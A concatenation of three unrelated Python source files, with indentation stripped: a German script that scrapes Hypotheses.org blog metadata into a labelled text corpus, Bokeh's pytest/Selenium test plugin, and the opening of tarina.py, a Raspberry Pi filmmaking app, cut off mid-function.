helper.append_op(type="load", inputs={}, output={"Out": out}, attrs=attrs)
|
Blogs_Preprocessing_I.py
|
# coding: utf-8
# # Erstellung des Datensatzes
# Texte: Blogbeiträge der Blogplattform Hypotheses.org
# Labels: Die von den Wissenschaftlern gewählten Themen und Disziplinen
#
# Autorin: Maria Hartmann
# In[2]:
# Import libraries
import numpy as np
import csv # for csv output
import requests # HTTP for humans
from bs4 import BeautifulSoup # module for web scraping
import _thread
from threading import Thread # to start parallel threads
import time # to get the processing time
import os
import shutil # to move files
from collections import Counter # to count element appearences in a list
# Einlesen der Ausgangsdatei metadata.csv
# In[4]:
# metadata.csv einlesen
folder = '../Preprocessing'
file = folder+'/metadata.csv'
lines = [] # all lines from metadata
de_lines = [] # german lines from metadata
with open(file, 'r', encoding='utf-8') as openfile:
metadata = openfile.readlines()
openfile.close()
for i, line in enumerate(metadata):
lines.append(line.replace('\n', '').split(";"))
if lines[i][1] == "de":
de_lines.append(lines[i])
else:
continue
# de_lines in numpy_array umgewandelt, weil Zugriff schneller geht, kann aber nicht verändert werden
np_lines = np.array(de_lines)
print(type(np_lines))
# Blogs ohne Disziplinen aus metadata.csv rausfiltern und in error_lines.csv schreiben
# Fehlerhafte Blogs (z.B. nicht mehr verfügbar oder einmalig andere Sprache) übergehen (wegschmeißen)
# die restlichen deutschen Daten in de_lines.csv schreiben
with open(folder+'/de_lines.csv', 'w', newline='', encoding="utf-8") as decsv, open(folder+'/unlabeled_lines.csv', 'w', newline='', encoding="utf-8") as unlabeledcsv, open(folder+'/error_lines.csv', 'w', newline='', encoding="utf-8") as errorcsv:
de = csv.writer(decsv, delimiter = ";")
unlabeled = csv.writer(unlabeledcsv, delimiter = ";")
errors = csv.writer(errorcsv, delimiter = ";")
for i, line in enumerate(np_lines):
if (np_lines[i][7] == "marginalie") or (np_lines[i][7] == "ciera"):
# keine Disziplinen zugeordnet,
unlabeled.writerow(line)
elif (np_lines[i][7] == "holocaustwebsites"):
# holocaustwebsites rausgefiltert, weil diese Website nicht mehr verfügbar ist
# alles andere wird über den Blogpost-per-Blog-Index gefiltert
#elif (np_lines[i][7] == "holocaustwebsites") or (np_lines[i][7] == "aleesp") or (np_lines[i][7] == "filstoria") or (np_lines[i][7] == "atb"):
# aleesp rausgefiltert, weil es eigentlich ein spanischer Blog ist und im deutschen Korpus nur 1x vorkommt
# filstoria rausgefiltert, weil es eigentlich ein italienischer Blog ist und im deutschen Korpus nur 1x vorkommt
# atb rausgefiltert, weil Disciplines und Themes fehlerhaft sind (mit Doppelpunkt) und der Blog mehrheitlich englisch ist
errors.writerow(line)
else:
de.writerow(line)
# de_lines.csv in data einlesen, um die Fehler nicht mit einlesen zu müssen
data = [] # alle lines aus de_lines, ohne errors
bloglist = [] # alle blogs, die in de_lines vorkommen
with open(folder+'/de_lines.csv', 'r', encoding='utf-8') as openfile:
de_csv = openfile.readlines()
openfile.close()
for i, line in enumerate(de_csv):
data.append(line.replace('\n', '').split(";"))
bloglist.append(data[i][7])
# In[5]:
# remove blogs with less than 10 posts, damit anderssprachige blogs mit einzelnen deutschen Posts rausgefiltert werden
c = Counter(bloglist)
blog_select = []
counter = 0
for key in sorted(c):
if c[key] < 10:
#print("%s: %s" % (key, c[key]))
blog_select.append(key)
counter += c[key]
trainset = [x for x in data if x[7] not in blog_select]
print(len(data))
print(len(trainset))
print(len(bloglist))
print(len(blog_select))
print(counter)
# Auslesen der Klassenbezeichnungen
# In[ ]:
# crawl subjects and themes
errorlist = []
def get_disciplines(index):
#print("\nline 1:", line)
#print(i+1)
#print(line)
url = trainset[index][9]
#print(i, "\npage:", url)
page = requests.get(url)
soup = BeautifulSoup(page.text, "html.parser")
if(soup.find(title="Zum Hypotheses-Katalogeintrag")):
element = soup.find(title="Zum Hypotheses-Katalogeintrag")
link = element.get("href")
#print("link:", link)
elif(soup.find(title="Zum OpenEdition-Katalogeintrag")):
element = soup.find(title="Zum OpenEdition-Katalogeintrag")
link = element.get("href")
#print("link:", link)
elif(soup.find(title="Ce carnet dans le catalogue d'Hypothèses")):
element = soup.find(title="Ce carnet dans le catalogue d'Hypothèses")
link = element.get("href")
#print("link:", link)
elif(soup.find(title="Ce carnet dans le catalogue d'OpenEdition")):
element = soup.find(title="Ce carnet dans le catalogue d'OpenEdition")
link = element.get("href")
#print("link:", link)
elif(soup.find(title="This blog in Hypotheses catalogue")):
element = soup.find(title="This blog in Hypotheses catalogue")
link = element.get("href")
#print("link:", link)
elif(soup.find(title="This blog in OpenEdition catalogue")):
element = soup.find(title="This blog in OpenEdition catalogue")
link = element.get("href")
#print("link:", link)
else:
print("Kein Open-Edition-Link gefunden!", index, trainset[index])
trainset[index].append("Kein Open-Edition-Link gefunden!")
errorlist.append(line)
return
subpage = requests.get(link)
#print(subpage)
subsoup = BeautifulSoup(subpage.text, "html.parser")
morelinks = subsoup.find(class_="more-links")
disciplines = []
for i, child in enumerate(morelinks.children):
#print("disciplines:", i, child)
disciplines.append(child)
#print(disciplines[9])
#print(disciplines[14])
if len(disciplines) > 13:
trainset[index].append(disciplines[9].replace("\n", "").strip())
trainset[index].append(disciplines[14].replace("\n", "").strip())
elif len(disciplines) > 8:
trainset[index].append(disciplines[9].replace("\n", "").replace('"', '').strip())
else:
print("Keine Disziplinen gefunden!", index, trainset[index])
trainset[index].append("Keine Disziplinen gefunden!")
errorlist.append(trainset[index])
#print("\nline 2:", line)
#print("trainset[i]:", trainset[i])
#print("FERTIG")
start = time.time()
# Create two threads as follows
threads = []
for i in range(0,len(trainset)):
if (i % 100 == 0):
print("Schon wieder 100 Threads gestartet:", i)
try:
t = Thread(target = get_disciplines, args=(i, ))
t.start()
threads.append(t)
except:
print ("Error: unable to start thread")
for t in threads:
# join() stellt sicher, dass das Hauptprogramm wartet, bis alle Threads terminiert haben
t.join()
print("Laufzeit in Minuten:", (time.time() - start) / 60)
# In[5]:
# show errors
print(len(errorlist))
print(errorlist)
# Speicherung der deutschen Blogbeiträge und ihrer Metadaten
# In[6]:
# add ; subjects ; themes to de_labeled_metadata.csv
print(type(trainset))
trainset.sort()
np_lines = np.array(trainset)
#print(np_lines)
with open(folder+'/de_labeled_metadata.csv', 'w', newline='', encoding="utf-8") as labeledcsv:
labeled = csv.writer(labeledcsv, delimiter = ";")
labeled.writerow(["filename", "language", "author", "numwords", "category", "date", "licence", "blog", "post", "url", "title", "disciplines", "themes"])
for i, line in enumerate(np_lines):
labeled.writerow(line)
# In[8]:
# move all german files to folder txt_de
newfolder = folder+'/txt_de'
if not os.path.exists(newfolder):
os.makedirs(newfolder)
newfilelist = os.listdir(newfolder)
newfilelist.sort()
oldfolder = folder+'/txt'
filelist = os.listdir(oldfolder)
filelist.sort()
#print(trainset[0])
#print(len(trainset))
#trainset.sort()
for line in trainset:
file = line[0] + '.txt'
if (file in filelist) and (file not in newfilelist):
shutil.copy2((oldfolder+'/'+file), (newfolder+'/'+file))
#print("deutsch: ", (oldfolder+'/'+file))
else:
#print("Nicht deutsch")
continue
# In[9]:
# 100 missing files in folder 'txt'
missing = []
filelist = os.listdir(newfolder)
filelist.sort()
#trainset.sort()
for line in trainset:
file = line[0] + '.txt'
if file not in filelist:
missing.append(file)
#print("deutsch: ", (directory+'/'+file))
else:
#print("Nicht deutsch")
continue
print(missing)
print(len(missing))
# In[10]:
# open german metadata file: de_labeled_metadata.csv
# and every Blogpost
filelist = os.listdir(newfolder)
filelist.sort()
lines = [] # alle in de_labeled_metadata.csv verzeichnete Blogposts
corpus = [] # deutschsprachige Blogposts
labels = [] # zugehörige Labels
errors = [] # in metadata.csv verzeichnete, aber in hypoposts-txt.zip nicht enthaltene Blogposts
filenames = [] # Blogposts ohne Fehler
onelabel = [] # Blogposts mit nur einer Art von Label (Thema oder Disziplin)
with open(folder+'/de_labeled_metadata.csv', 'r', encoding='utf-8') as openfile:
metadata = openfile.readlines()
openfile.close()
#print(metadata[0])
for i, line in enumerate(metadata[1:]):
#print(i)
lines.append(line.split(";"))
#print("\nFile:", lines[i][0])
#print("Themes:", lines[i][11])
#print("Disciplines:", lines[i][12])
file = (lines[i][0] + '.txt')
#print("Filename:", file)
if file in filelist:
with open((newfolder+'/'+file), 'r', encoding='utf-8') as textfile:
text = textfile.read()
textfile.close()
filenames.append(file)
corpus.append(text)
if len(lines[i]) > 12:
labels.append(lines[i][11] + "; " + lines[i][12])
elif len(lines[i]) > 10:
labels.append(lines[i][11])
onelabel.append(file)
else:
print("keine Disziplin gefunden!", lines[i])
else:
print("File nicht gefunden!", file)
errors.append(file)
continue
print("\n")
print(len(corpus))
print(len(labels))
print(len(filenames))
print(len(errors))
print(len(onelabel))
for blog in onelabel:
print(blog)
# Erstellung der Datenbasis: Dateinamen, Blogbeiträge und zugehörige Klassen (Themen und Disziplinen)
# In[11]:
# write csv-file de_labeled_corpus.csv: filename, classes, text
with open(folder+'/de_labeled_corpus.csv', 'w', newline='', encoding="utf-8") as labeledcsv:
labeled = csv.writer(labeledcsv, delimiter = ";")
labeled.writerow(["filename", "classes", "text"])
for file, label, line in zip(filenames, labels, corpus):
labeled.writerow([file.replace('\n', ' '), label.replace('\n', ''), line.replace('\n', ' ')])
|
project.py
|
#-----------------------------------------------------------------------------
# Copyright (c) 2012 - 2022, Anaconda, Inc., and Bokeh Contributors.
# All rights reserved.
#
# The full license is in the file LICENSE.txt, distributed with this software.
#-----------------------------------------------------------------------------
''' Define a Pytest plugin for a Bokeh-specific testing tools
'''
#-----------------------------------------------------------------------------
# Boilerplate
#-----------------------------------------------------------------------------
from __future__ import annotations
import logging # isort:skip
log = logging.getLogger(__name__)
#-----------------------------------------------------------------------------
# Imports
#-----------------------------------------------------------------------------
# Standard library imports
import socket
import time
from contextlib import closing
from threading import Thread
from typing import (
TYPE_CHECKING,
Any,
Callable,
Dict,
Tuple,
)
# External imports
import pytest
from selenium.webdriver.common.action_chains import ActionChains
from selenium.webdriver.support import expected_conditions as EC
from selenium.webdriver.support.wait import WebDriverWait
from tornado.ioloop import IOLoop
from tornado.web import RequestHandler
from typing_extensions import Protocol
if TYPE_CHECKING:
from selenium.webdriver.common.keys import _KeySeq
from selenium.webdriver.remote.webdriver import WebDriver
from selenium.webdriver.remote.webelement import WebElement
# Bokeh imports
import bokeh.server.views.ws as ws
from bokeh._testing.util.selenium import (
INIT,
RESULTS,
find_matching_element,
get_events_el,
)
from bokeh.application.handlers.function import ModifyDoc
from bokeh.io import save
from bokeh.models import LayoutDOM, Plot
from bokeh.server.server import Server
if TYPE_CHECKING:
from bokeh._testing.plugins.file_server import SimpleWebServer
from bokeh.model import Model
#-----------------------------------------------------------------------------
# Globals and constants
#-----------------------------------------------------------------------------
pytest_plugins = (
"bokeh._testing.plugins.project",
"bokeh._testing.plugins.file_server",
"bokeh._testing.plugins.selenium",
)
__all__ = (
'bokeh_app_info',
'bokeh_model_page',
'bokeh_server_page',
'find_free_port',
'output_file_url',
'single_plot_page',
'test_file_path_and_url',
)
#-----------------------------------------------------------------------------
# General API
#-----------------------------------------------------------------------------
@pytest.fixture
def output_file_url(request: pytest.FixtureRequest, file_server: SimpleWebServer) -> str:
from bokeh.io import output_file
filename = request.function.__name__ + '.html'
file_obj = request.fspath.dirpath().join(filename)
file_path = file_obj.strpath
url = file_path.replace('\\', '/') # Windows-proof
output_file(file_path, mode='inline')
def tear_down() -> None:
if file_obj.isfile():
file_obj.remove()
request.addfinalizer(tear_down)
return file_server.where_is(url)
@pytest.fixture
def test_file_path_and_url(request: pytest.FixtureRequest, file_server: SimpleWebServer) -> Tuple[str, str]:
filename = request.function.__name__ + '.html'
file_obj = request.fspath.dirpath().join(filename)
file_path = file_obj.strpath
url = file_path.replace('\\', '/') # Windows-proof
def tear_down() -> None:
if file_obj.isfile():
file_obj.remove()
request.addfinalizer(tear_down)
return file_path, file_server.where_is(url)
class _ExitHandler(RequestHandler):
def initialize(self, io_loop: IOLoop) -> None:
self.io_loop = io_loop
async def get(self, *args: Any, **kwargs: Any) -> None:
self.io_loop.stop()
def find_free_port() -> int:
with closing(socket.socket(socket.AF_INET, socket.SOCK_STREAM)) as s:
s.bind(('', 0))
return s.getsockname()[1]
class BokehAppInfo(Protocol):
def __call__(self, modify_doc: ModifyDoc) -> Tuple[str, ws.MessageTestPort]: ...
class HasNoConsoleErrors(Protocol):
def __call__(self, webdriver: WebDriver) -> bool: ...
@pytest.fixture
def bokeh_app_info(request: pytest.FixtureRequest, driver: WebDriver) -> BokehAppInfo:
''' Start a Bokeh server app and return information needed to test it.
Returns a tuple (url, message_test_port), where the latter is an instance of
``MessageTestPort`` dataclass, and will contain all messages that the Bokeh
Server sends/receives while running during the test.
'''
def func(modify_doc: ModifyDoc) -> Tuple[str, ws.MessageTestPort]:
ws._message_test_port = ws.MessageTestPort(sent=[], received=[])
port = find_free_port()
def worker() -> None:
io_loop = IOLoop()
server = Server({'/': modify_doc},
port=port,
io_loop=io_loop,
extra_patterns=[('/exit', _ExitHandler, dict(io_loop=io_loop))])
server.start()
server.io_loop.start()
t = Thread(target=worker)
t.start()
def cleanup() -> None:
driver.get(f"http://localhost:{port}/exit")
# XXX (bev) this line is a workaround for https://github.com/bokeh/bokeh/issues/7970
# and should be removed when that issue is resolved
driver.get_log('browser')
ws._message_test_port = None
t.join()
request.addfinalizer(cleanup)
return f"http://localhost:{port}/", ws._message_test_port
return func
class _ElementMixin:
_driver: WebDriver
def click_element_at_position(self, element: WebElement, x: int, y: int) -> None:
actions = ActionChains(self._driver)
actions.move_to_element_with_offset(element, x, y)
actions.click()
actions.perform()
def double_click_element_at_position(self, element: WebElement, x: int, y: int) -> None:
actions = ActionChains(self._driver)
actions.move_to_element_with_offset(element, x, y)
actions.click()
actions.click()
actions.perform()
def drag_element_at_position(self, element: WebElement, x: int, y: int, dx: int, dy: int, mod: _KeySeq | None = None) -> None:
actions = ActionChains(self._driver)
if mod:
actions.key_down(mod)
actions.move_to_element_with_offset(element, x, y)
actions.click_and_hold()
actions.move_by_offset(dx, dy)
actions.release()
if mod:
actions.key_up(mod)
actions.perform()
def send_keys(self, *keys: _KeySeq) -> None:
actions = ActionChains(self._driver)
actions.send_keys(*keys)
actions.perform()
class _CanvasMixin(_ElementMixin):
canvas: WebElement
def click_canvas_at_position(self, plot: Plot, x: int, y: int) -> None:
events_el = get_events_el(self._driver, plot)
self.click_element_at_position(events_el, x, y)
def double_click_canvas_at_position(self, plot: Plot, x: int, y: int) -> None:
events_el = get_events_el(self._driver, plot)
self.double_click_element_at_position(events_el, x, y)
def drag_canvas_at_position(self, plot: Plot, x: int, y: int, dx: int, dy: int, mod: _KeySeq | None = None) -> None:
events_el = get_events_el(self._driver, plot)
self.drag_element_at_position(events_el, x, y, dx, dy, mod)
def click_custom_action(self) -> None:
button = find_matching_element(self._driver, ".bk-toolbar-button-custom-action")
button.click()
def get_toolbar_button(self, name: str) -> WebElement:
return find_matching_element(self._driver, f".bk-tool-icon-{name}")
class _BokehPageMixin(_ElementMixin):
test_div: WebElement
_driver: WebDriver
_has_no_console_errors: HasNoConsoleErrors
@property
def results(self) -> Dict[str, Any]:
WebDriverWait(self._driver, 10).until(EC.staleness_of(self.test_div))
self.test_div = find_matching_element(self._driver, ".bokeh-test-div")
return self._driver.execute_script(RESULTS)
@property
def driver(self) -> WebDriver:
return self._driver
def init_results(self) -> None:
self._driver.execute_script(INIT)
self.test_div = find_matching_element(self._driver, ".bokeh-test-div")
def has_no_console_errors(self) -> bool:
return self._has_no_console_errors(self._driver)
class _BokehModelPage(_BokehPageMixin):
def __init__(self, model: LayoutDOM, driver: WebDriver, output_file_url: str, has_no_console_errors: HasNoConsoleErrors) -> None:
self._driver = driver
self._model = model
self._has_no_console_errors = has_no_console_errors
save(self._model)
self._driver.get(output_file_url)
self.init_results()
await_ready(driver, model)
BokehModelPage = Callable[[LayoutDOM], _BokehModelPage]
@pytest.fixture()
def bokeh_model_page(driver: WebDriver, output_file_url: str, has_no_console_errors: HasNoConsoleErrors) -> BokehModelPage:
def func(model: LayoutDOM) -> _BokehModelPage:
return _BokehModelPage(model, driver, output_file_url, has_no_console_errors)
return func
class _SinglePlotPage(_BokehModelPage, _CanvasMixin):
# model may be a layout, but should only contain a single plot
def __init__(self, model: LayoutDOM, driver: WebDriver, output_file_url: str, has_no_console_errors: HasNoConsoleErrors) -> None:
super().__init__(model, driver, output_file_url, has_no_console_errors)
SinglePlotPage = Callable[[LayoutDOM], _SinglePlotPage]
@pytest.fixture()
def single_plot_page(driver: WebDriver, output_file_url: str,
has_no_console_errors: HasNoConsoleErrors) -> SinglePlotPage:
def func(model: LayoutDOM) -> _SinglePlotPage:
return _SinglePlotPage(model, driver, output_file_url, has_no_console_errors)
return func
class _BokehServerPage(_BokehPageMixin, _CanvasMixin):
def __init__(self, modify_doc: ModifyDoc, driver: WebDriver, bokeh_app_info: BokehAppInfo, has_no_console_errors: HasNoConsoleErrors) -> None:
self._driver = driver
self._has_no_console_errors = has_no_console_errors
self._app_url, self.message_test_port = bokeh_app_info(modify_doc)
time.sleep(0.1)
self._driver.get(self._app_url)
self.init_results()
def ready(driver: WebDriver) -> bool:
try:
await_all_ready(driver)
return True
except RuntimeError:
return False
WebDriverWait(self._driver, 10).until(ready)
BokehServerPage = Callable[[ModifyDoc], _BokehServerPage]
@pytest.fixture()
def bokeh_server_page(driver: WebDriver, bokeh_app_info: BokehAppInfo,
has_no_console_errors: HasNoConsoleErrors) -> BokehServerPage:
def func(modify_doc: ModifyDoc) -> _BokehServerPage:
return _BokehServerPage(modify_doc, driver, bokeh_app_info, has_no_console_errors)
return func
def await_ready(driver: WebDriver, root: Model) -> None:
script = """
const [root_id, done] = [...arguments];
(async function() {
const view = Bokeh.index[root_id]
if (view == null)
done(false)
else {
await view.ready
done(true)
}
})()
"""
if not driver.execute_async_script(script, root.id):
raise RuntimeError(f"could not find a root view for {root}")
def await_all_ready(driver: WebDriver) -> None:
script = """
const [done] = [...arguments];
(async function() {
const views = [...Object.values(Bokeh.index)]
if (views.length == 0)
done(false)
else {
await Promise.all(views.map((view) => view.ready))
done(true)
}
})()
"""
if not driver.execute_async_script(script):
raise RuntimeError("could not find any root views")
#-----------------------------------------------------------------------------
# Dev API
#-----------------------------------------------------------------------------
#-----------------------------------------------------------------------------
# Private API
#-----------------------------------------------------------------------------
#-----------------------------------------------------------------------------
# Code
#-----------------------------------------------------------------------------
|
tarina.py
|
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
# ```````` `````` ``````` ``` ```` ``` ``````
# ` ``` ` `` ``` ``` ``` ``` ```` `` `` ```
# ``` ``````` ``` ```` ``` ```````` ``````
# ``` `` `` `````` ``` `` ````` ``` ``
# ``` ``` ``` ``` ``` ``` ``` ```` ``` ```
# ```` ``` ```` ``` ``` ``` ```` ``` ``` ````
# a Muse of Filmmaking
# https://tarina.org
import picamerax as picamera
import numpy as np
import string
import os
import time
import multiprocessing as mp
from subprocess import call
from subprocess import Popen
from omxplayer import OMXPlayer
import subprocess
import sys
import pickle
import RPi.GPIO as GPIO
from PIL import Image
import socket
import configparser
import shortuuid
import smbus
#import shlex
from blessed import Terminal
# bless the code!
term = Terminal()
#DEBIAN VERSION
pipe = subprocess.check_output('lsb_release -c -s', shell=True)
debianversion = pipe.decode().strip()
print('running debian ' + debianversion)
#I2CBUTTONS
probei2c = 0
while probei2c < 10:
try:
if debianversion == "stretch":
os.system('sudo modprobe i2c-dev')
bus = smbus.SMBus(3) # Rev 2 Pi uses 1
else:
os.system('sudo modprobe i2c-dev')
bus = smbus.SMBus(11) # Rev 2 Pi uses 1
DEVICE = 0x20 # Device address (A0-A2)
IODIRB = 0x0d # Pin pullups B-side
IODIRA = 0x00 # Pin pullups A-side 0x0c
IODIRApullup = 0x0c # Pin pullups A-side 0x0c
GPIOB = 0x13 # Register B-side for inputs
GPIOA = 0x12 # Register A-side for inputs
OLATA = 0x14 # Register for outputs
bus.write_byte_data(DEVICE,IODIRB,0xFF) # set all gpiob to input
bus.write_byte_data(DEVICE,IODIRApullup,0xF3) # set two pullup inputs and two outputs
bus.write_byte_data(DEVICE,IODIRA,0xF3) # set two inputs and two outputs
bus.write_byte_data(DEVICE,OLATA,0x4)
print("yes, found em i2c buttons!")
i2cbuttons = True
break
except:
print("could not find i2c buttons!! running in keyboard only mode")
print("trying again...")
i2cbuttons = False
probei2c += 1
time.sleep(1)
#MAIN
def main():
global headphoneslevel, miclevel, tarinafolder, screen, loadfilmsettings, plughw, channels
# Get path of the current dir, then use it as working directory:
rundir = os.path.dirname(__file__)
if rundir != '':
os.chdir(rundir)
filmfolder = "/home/pi/Videos/"
if os.path.isdir(filmfolder) == False:
os.makedirs(filmfolder)
tarinafolder = os.getcwd()
#MENUS
menu = 'FILM:', 'SCENE:', 'SHOT:', 'TAKE:', '', 'SHUTTER:', 'ISO:', 'RED:', 'BLUE:', 'BRIGHT:', 'CONT:', 'SAT:', 'FLIP:', 'BEEP:', 'LENGTH:', 'HW:', 'CH:', 'MIC:', 'PHONES:', 'COMP:', 'TIMELAPSE', 'LENS:', 'DSK:', 'SHUTDOWN', 'SRV:', 'WIFI:', 'UPDATE', 'UPLOAD', 'BACKUP', 'LOAD', 'NEW', 'TITLE', 'LIVE:'
#STANDARD VALUES (some of these may not be needed, should do some clean up)
abc = '_','a','b','c','d','e','f','g','h','i','j','k','l','m','n','o','p','q','r','s','t','u','v','w','x','y','z','A','B','C','D','E','F','G','H','I','J','K','L','M','N','O','P','Q','R','S','T','U','V','W','X','Y','Z','1','2','3','4','5','6','7','8','9','0'
keydelay = 0.0555
selectedaction = 0
selected = 0
awb = 'auto', 'sunlight', 'cloudy', 'shade', 'tungsten', 'fluorescent', 'incandescent', 'flash', 'horizon'
awbx = 0
awb_lock = 'no'
headphoneslevel = 40
miclevel = 50
recording = False
retake = False
lastmenu = ''
rendermenu = True
overlay = None
reclenght = 0
t = 0
rectime = ''
scene = 1
shot = 1
take = 1
filmname = ''
beeps = 0
beepcountdown = 0
beeping = False
lastbeep = time.time()
flip = 'no'
between = 30
duration = 0.2
lenses = os.listdir('lenses/')
lens = lenses[0]
buttontime = time.time()
pressed = ''
buttonpressed = False
holdbutton = ''
updatethumb = False
delayerr = ''
loadfilmsettings = True
oldsettings = ''
comp = 1
yankedscene = ''
cuttedscene = ''
cuttedshot = ''
yankedshot = ''
stream = ''
live = 'no'
plughw = 0 #default audio device
channels = 1 #default mono
#SAVE SETTINGS FREQUENCY IN SECS
pausetime = time.time()
savesettingsevery = 10
#TARINA VERSION
f = open(tarinafolder + '/VERSION')
tarinaversion = f.readline()
tarinavername = f.readline()
#SYSTEM CONFIGS (turn off hdmi)
run_command('tvservice -o')
#Kernel page cache optimization for sd card
run_command('sudo ' + tarinafolder + '/extras/sdcardhack.sh')
#COUNT DISKSPACE
disk = os.statvfs(filmfolder)
diskleft = str(int(disk.f_bavail * disk.f_frsize / 1024 / 1024 / 1024)) + 'Gb'
#START INTERFACE
startinterface()
camera = startcamera(lens)
#LOAD FILM AND SCENE SETTINGS
try:
filmname = getfilms(filmfolder)[0][0]
except:
filmname = ''
#THUMBNAILCHECKER
oldscene = scene
oldshot = shot
oldtake = take
#TURN OFF WIFI AND TARINA SERVER
try:
if sys.argv[1] == 'default':
serverstate = 'off'
wifistate = 'off'
run_command('sudo iwconfig wlan0 txpower off')
serverstate = tarinaserver(False)
except:
serverstate = 'off'
wifistate = 'on'
#serverstate = tarinaserver(False)
#TO_BE_OR_NOT_TO_BE
foldername = filmfolder + filmname + '/' + 'scene' + str(scene).zfill(3) +'/shot' + str(shot).zfill(3) + '/'
filename = 'take' + str(take).zfill(3)
recordable = not os.path.isfile(foldername + filename + '.mp4') and not os.path.isfile(foldername + filename + '.h264')
#--------------MAIN LOOP---------------#
while True:
pressed, buttonpressed, buttontime, holdbutton, event, keydelay = getbutton(pressed, buttonpressed, buttontime, holdbutton)
if buttonpressed == True:
flushbutton()
#event = screen.getch()
if recording == False:
#SHUTDOWN
if pressed == 'middle' and menu[selected] == 'SHUTDOWN':
writemessage('Hold on shutting down...')
time.sleep(1)
run_command('sudo shutdown -h now')
#PEAKING
elif pressed == 'peak' and recordable == True:
if shot > 1:
peakshot = shot - 1
peaktake = counttakes(filmname, filmfolder, scene, peakshot)
p_imagename = filmfolder + filmname + '/scene' + str(scene).zfill(3) + '/shot' + str(peakshot).zfill(3) + '/take' + str(peaktake).zfill(3) + '.jpeg'
overlay = displayimage(camera, p_imagename, overlay)
while holdbutton == 'peak':
pressed, buttonpressed, buttontime, holdbutton, event, keydelay = getbutton(pressed, buttonpressed, buttontime, holdbutton)
writemessage('peaking ' + str(peakshot))
overlay = removeimage(camera, overlay)
#TIMELAPSE
elif pressed == 'middle' and menu[selected] == 'TIMELAPSE':
overlay = removeimage(camera, overlay)
takes = counttakes(filmname, filmfolder, scene, shot)
if takes > 0:
shot = countshots(filmname, filmfolder, scene) + 1
take = 1
foldername = filmfolder + filmname + '/' + 'scene' + str(scene).zfill(3) +'/shot' + str(shot).zfill(3) + '/'
filename = 'take' + str(take).zfill(3)
renderedfilename, between, duration = timelapse(beeps,camera,foldername,filename,between,duration)
if renderedfilename != '':
#render thumbnail
#writemessage('creating thumbnail')
#run_command('avconv -i ' + foldername + filename + '.mp4 -frames 1 -vf scale=800:340 ' + foldername + filename + '.jpeg')
updatethumb = True
#VIEW SCENE
elif pressed == 'view' and menu[selected] == 'SCENE:':
filmfiles = shotfiles(filmfolder, filmname, scene)
writemessage('Loading scene...')
if len(filmfiles) > 0:
#Check if rendered video exist
camera.stop_preview()
#renderfilename, newaudiomix = renderscene(filmfolder, filmname, scene)
renderfilename = renderfilm(filmfolder, filmname, comp, scene, False)
playdub(renderfilename, 'scene')
camera.start_preview()
#VIEW FILM
elif pressed == 'view' and menu[selected] == 'FILM:':
filmfiles = viewfilm(filmfolder, filmname)
writemessage('Loading film...')
if len(filmfiles) > 0:
camera.stop_preview()
renderfilename = renderfilm(filmfolder, filmname, comp, 0, True)
playdub(renderfilename, 'film')
camera.start_preview()
#VIEW SHOT OR TAKE
elif pressed == 'view':
takes = counttakes(filmname, filmfolder, scene, shot)
writemessage('Loading clip...')
if takes > 0:
removeimage(camera, overlay)
camera.stop_preview()
foldername = filmfolder + filmname + '/scene' + str(scene).zfill(3) +'/shot' + str(shot).zfill(3) + '/'
filename = 'take' + str(take).zfill(3)
compileshot(foldername + filename)
trim = playdub(foldername + filename, 'shot')
if trim:
take = counttakes(filmname, filmfolder, scene, shot)+1
trim_filename = foldername + 'take' + str(take).zfill(3)
videotrim(foldername + filename, trim_filename, trim[0], trim[1])
imagename = foldername + filename + '.jpeg'
overlay = displayimage(camera, imagename, overlay)
camera.start_preview()
#DUB SCENE
elif pressed == 'middle' and menu[selected] == 'SCENE:':
newdub = clipsettings(filmfolder, filmname, scene, plughw)
if newdub:
camera.stop_preview()
renderfilename, newaudiomix = renderscene(filmfolder, filmname, scene)
playdub(renderfilename, 'dub')
run_command('sox -V0 -G /dev/shm/dub.wav ' + newdub)
vumetermessage('new scene dubbing made!')
camera.start_preview()
time.sleep(1)
else:
vumetermessage('see ya around!')
#DUB FILM
elif pressed == 'middle' and menu[selected] == 'FILM:':
newdub = clipsettings(filmfolder, filmname, '', plughw)
if newdub:
camera.stop_preview()
renderfilename = renderfilm(filmfolder, filmname, comp, 0, False)
playdub(renderfilename, 'dub')
run_command('sox -V0 -G /dev/shm/dub.wav ' + newdub)
vumetermessage('new film dubbing made!')
camera.start_preview()
time.sleep(1)
else:
vumetermessage('see ya around!')
#BACKUP
elif pressed == 'middle' and menu[selected] == 'BACKUP':
copytousb(filmfolder)
#UPLOAD
elif pressed == 'middle' and menu[selected] == 'UPLOAD':
if webz_on() == True:
filmfiles = viewfilm(filmfolder, filmname)
if len(filmfiles) > 0:
renderfilename = renderfilm(filmfolder, filmname, comp, 0, True)
cmd = uploadfilm(renderfilename, filmname)
if cmd != None:
stopinterface(camera)
try:
run_command(cmd)
except:
logger.warning('uploadfilm bugging')
startinterface()
camera = startcamera(lens)
loadfilmsettings = True
selectedaction = 0
#LOAD FILM
elif pressed == 'middle' and menu[selected] == 'LOAD':
filmname = loadfilm(filmname, filmfolder)
loadfilmsettings = True
#UPDATE
elif pressed == 'middle' and menu[selected] == 'UPDATE':
if webz_on() == True:
stopinterface(camera)
tarinaversion, tarinavername = update(tarinaversion, tarinavername)
startinterface()
camera = startcamera(lens)
loadfilmsettings = True
selectedaction = 0
#WIFI
elif pressed == 'middle' and menu[selected] == 'WIFI:':
stopinterface(camera)
run_command('wicd-curses')
startinterface()
camera = startcamera(lens)
loadfilmsettings = True
#NEW FILM
elif pressed == 'middle' and menu[selected] == 'NEW' or filmname == '':
newfilmname = nameyourfilm(filmfolder, filmname, abc, True)
if filmname != newfilmname:
filmname = newfilmname
os.makedirs(filmfolder + filmname)
writemessage('Good luck with your film ' + filmname + '!')
#make a filmhash
print('making filmhash...')
filmhash = shortuuid.uuid()
with open(filmfolder + filmname + '/.filmhash', 'w') as f:
f.write(filmhash)
updatethumb = True
updatemenu = True
scene = 1
shot = 1
take = 1
selectedaction = 0
else:
vumetermessage('')
#EDIT FILM NAME
elif pressed == 'middle' and menu[selected] == 'TITLE' or filmname == '':
newfilmname = nameyourfilm(filmfolder, filmname, abc, False)
if filmname != newfilmname:
os.system('mv ' + filmfolder + filmname + ' ' + filmfolder + newfilmname)
filmname = newfilmname
vumetermessage('Film title changed to ' + filmname + '!')
else:
vumetermessage('')
#(YANK) COPY SHOT
elif pressed == 'copy' and menu[selected] == 'SHOT:' and recordable == False:
cuttedshot = ''
yankedshot = filmfolder + filmname + '/' + 'scene' + str(scene).zfill(3) +'/shot' + str(shot).zfill(3)
